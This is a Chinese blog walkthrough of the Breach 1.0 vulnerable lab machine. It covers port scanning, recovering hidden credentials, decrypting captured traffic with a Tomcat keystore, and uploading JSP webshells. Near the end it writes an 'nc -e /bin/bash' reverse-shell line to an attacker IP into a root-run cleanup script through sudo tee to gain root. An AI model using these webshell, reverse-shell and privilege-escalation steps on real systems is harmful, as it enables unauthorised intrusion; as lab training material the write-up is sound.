breach1.0靶场

1.nmap扫描ip靶机端口

在这里插入图片描述在这里插入图片描述
2.进入首页http://192.168.110.140/
在这里插入图片描述
3.查看页面源代码 发现
在这里插入图片描述

两次base64解密<!------pgibbons:damnitfeel g o o d t o b e a g a n g goodtobeagang goodtobeagangta ----->
这个可能是某个地方的账号密码 (先记下来)
4.点击主页图片 再进入
在这里插入图片描述
5.发现一个登陆界面 用刚才的密码登录
在这里插入图片描述
6.点击各个功能点 发现邮件里有一个keystore的文件,点击下载
在这里插入图片描述
7.继续浏览功能点发现一个按钮,点击此链接
在这里插入图片描述
8.发现一个pcap流量包,点击下载 同时观察页面发现重要信息密码都是tomcat
在这里插入图片描述
9.把第一个下载的文件kerstore放到根目录,进入java/jre
将keystore放到C盘根目录,查看keystore这个密钥库里面的所有证书
keytool -list -keystore c:\keystore 输入密钥库口令tomcat:

从密钥库导出.p12证书,将keystore拷贝到keytool目录,导出名为:tomcatkeystore.p12的证书,命令:
keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12
-srcalias tomcat

在这里插入图片描述在这里插入图片描述在这里插入图片描述
10.将导出的证书导入wireshare

导入流量包
在这里插入图片描述
在这里插入图片描述

在流量包里找到后台地址
在这里插入图片描述
账号密码流量包
在这里插入图片描述
11.访问后台,解密后得tomcat:Tt\5D8F(#!*u=G)4m7zB
由于该地址的证书不安全,所以需要开启burpsuite,经过代理可以添加安全例外
在这里插入图片描述

传完马的位置 192.168.110.140:8443/压缩包的名字/木马名字.jsp
在这里插入图片描述
发现的问题:上传的菜刀马,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用菜刀,主机可能有杀软或者杀web shell工具。解决方法:bash反弹一个shell出来。
11.制作msf5马
在这里插入图片描述
配置msf5准备监听

在这里插入图片描述

将木马上传到服务器,访问木马,反弹到shell

在这里插入图片描述

反弹终端
在这里插入图片描述在这里插入图片描述

收集主机信息
在这里插入图片描述
查看用户的密码,发现两个用户
在这里插入图片描述

进入数据库,好像不用密码

在这里插入图片描述

查看数据库中的内容
在这里插入图片描述

得到密码:thelaststraw
登陆用户milton
在这里插入图片描述
在这里插入图片描述
但是有个图片文件,联想到blumbergh用户下应该也有图片
进不去,但是在前面的时候有个gif的图片

在这里插入图片描述

将下载好的图片打包在这里插入图片描述

打印图片中的可打印字符,追加输出到image.txt

在这里插入图片描述

提权成功

在这里插入图片描述

查看历史命令
在这里插入图片描述

查看用户权限
在这里插入图片描述
查看权限发现/usr/share/cleanup/tidyup.sh只有root可写
在这里插入图片描述
可以用root权限运行tee命令
在这里插入图片描述
那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令
echo “nc -e /bin/bash 192.168.110.128 8989” > shell.txt
用tee命令将shell.txt内容输出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
查看是够写入成功
cat /usr/share/cleanup/tidyup.sh

开启监听
在这里插入图片描述
成功 用id命令查看权限
用命令python -c 'import pty;pty.spawn("/bin/bash")'得到交互页面
在这里插入图片描述
将图片挪到home目录下
在这里插入图片描述
上传大马
在这里插入图片描述

拿到flag
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值